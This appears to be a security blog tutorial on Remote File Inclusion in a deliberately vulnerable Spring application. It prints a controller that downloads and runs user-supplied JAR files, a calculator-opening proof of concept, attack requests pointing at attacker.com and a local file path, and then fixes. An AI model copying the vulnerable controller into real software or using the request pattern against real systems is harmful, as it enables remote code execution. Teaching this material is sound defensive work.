๐ This blog is about Remote File Inclusion (RFI), how attackers exploit it to execute malicious code remotely, and how developers can secure their applications against this vulnerability. We will analyze a real-world vulnerable web application, PinewoodStore, demonstrate a full attack scenario using a proof-of-concept (PoC) JAR file (poc1.jar), and discuss mitigation strategies.
Note:
A full demo of this attack will be posted on our YouTube channel, showcasing step-by-step exploitation and mitigation techniques.
What is Remote File Inclusion (RFI)?
Remote File Inclusion (RFI) is a critical web vulnerability that allows an attacker to inject and execute external code by including remote files. This can lead to:
- Remote Code Execution (RCE) โ The attacker can run arbitrary code on the server.
- Server Takeover โ Attackers can deploy backdoors and gain full control.
- Sensitive Data Exposure โ Configuration files, user credentials, and more can be stolen.
- Malware Injection โ The server can be used to distribute malware to visitors.
RFI Vulnerability in PinewoodStore
Vulnerable Source Code (RfiController.java)
@Controller
@RequestMapping("/rfi")
public class RfiController {
@Value("${rfi.jar.location}") // Inject the value from application.properties
private String jarLocation;
@GetMapping("/load")
public ResponseEntity<String> loadAndExecuteJar(@RequestParam String url) {
System.out.println("Received request to load URL: " + url);
try {
// Check if URL is a local file path
if (url.startsWith("file://")) {
System.out.println("Processing local file: " + url);
String filePath = url.substring(7); // Remove 'file://' prefix
System.out.println("Extracted file path: " + filePath);
if (Files.exists(Paths.get(filePath))) {
System.out.println("Local file exists, proceeding with execution.");
return executeJar(filePath);
} else {
System.out.println("Local file not found: " + filePath);
return ResponseEntity.status(HttpStatus.BAD_REQUEST)
.body("Local file not found: " + filePath);
}
}
// Handle remote RFI attack
System.out.println("Attempting to download remote file from: " + url);
URL remoteUrl = new URL(url);
InputStream in = remoteUrl.openStream();
File tempFile = File.createTempFile("RemoteFile", ".jar");
// Save the downloaded file
try (OutputStream out = new FileOutputStream(tempFile)) {
byte[] buffer = new byte[4096];
int bytesRead;
while ((bytesRead = in.read(buffer)) != -1) {
out.write(buffer, 0, bytesRead);
}
}
System.out.println("Downloaded JAR saved to: " + tempFile.getAbsolutePath());
return executeJar(tempFile.getAbsolutePath());
} catch (Exception e) {
System.out.println("Execution error: " + e.getMessage());
return ResponseEntity.status(HttpStatus.BAD_REQUEST).body("Execution error: " + e.getMessage());
}
}
private ResponseEntity<String> executeJar(String jarFilePath) {
try {
System.out.println("Executing JAR file: " + jarFilePath);
// Execute the JAR file (vulnerability)
ProcessBuilder processBuilder = new ProcessBuilder("java", "-jar", jarFilePath);
Process process = processBuilder.start();
BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
System.out.println("JAR Output: " + line);
}
process.waitFor();
return ResponseEntity.ok("Executed JAR file: " + jarFilePath);
} catch (Exception e) {
return ResponseEntity.status(HttpStatus.INTERNAL_SERVER_ERROR)
.body("Failed to execute JAR: " + e.getMessage());
}
}
}
Why is this Code Vulnerable?
- Accepts unvalidated URLs, allowing an attacker to supply an external file.
- Downloads and executes a remote JAR file, allowing arbitrary code execution.
- No security controls like file type validation or URL filtering.
- Allows execution of local files using
file://URLs.
Full Attack Demonstration Using poc1.jar (Proof-of-Concept)
PoC 1: Executing poc1.jar to Open Ubuntu Calculator
To demonstrate RFI, we will create a simple Java program (poc1.jar) that opens the calculator (gnome-calculator) on Ubuntu.
Source Code for poc1.jar
import java.io.IOException;
public class Poc1 {
public static void main(String[] args) {
try {
System.out.println("Executing Calculator...");
ProcessBuilder processBuilder = new ProcessBuilder("gnome-calculator");
processBuilder.start();
} catch (IOException e) {
System.out.println("Error executing calculator: " + e.getMessage());
}
}
}
Steps to Compile and Create poc1.jar:
javac Poc1.java jar cfe poc1.jar Poc1 Poc1.class
Executing poc1.jar via RFI
1. Hosting the Malicious JAR
The attacker hosts poc1.jar on their server:
http://attacker.com/poc1.jar
2. Triggering the Attack
GET /rfi/load?url=http://attacker.com/poc1.jar
For the demo I would use python http server that would server the file from my local machine to the server that is being targeted for RCE using the Remote file inclusion vulnerability.
3. What Happens?
- PinewoodStore downloads
poc1.jar. - It executes
poc1.jarusingProcessBuilder. - The Ubuntu calculator (
gnome-calculator) opens, proving Remote Code Execution (RCE).
4. Executing a Local JAR
If the attacker has already uploaded poc1.jar onto the server:
GET /rfi/load?url=file:///tmp/poc1.jar
This executes poc1.jar directly, demonstrating how attackers can leverage local files for exploitation.
How to Fix RFI in PinewoodStore?
1. Validate User Input (Allow Only Trusted URLs)
Reject all unknown external URLs:
if (!url.startsWith("https://trusted-source.com/")) {
return ResponseEntity.status(HttpStatus.FORBIDDEN).body("Invalid URL");
}
2. Block Remote File Execution
Instead of blindly executing any JAR, restrict execution to verified local files:
if (!Paths.get(jarFilePath).startsWith(Paths.get(jarLocation))) {
return ResponseEntity.status(HttpStatus.FORBIDDEN).body("Execution not allowed");
}
3. Disable file:// URLs
Reject file-based URLs to prevent local file execution.
if (url.startsWith("file://")) {
return ResponseEntity.status(HttpStatus.FORBIDDEN).body("Local file execution is not allowed");
}
Conclusion
The PinewoodStore web application is critically vulnerable to Remote File Inclusion (RFI), allowing attackers to remotely execute arbitrary code. Using poc1.jar, we demonstrated how an attacker can open a calculator on Ubuntu, proving RCE is possible.
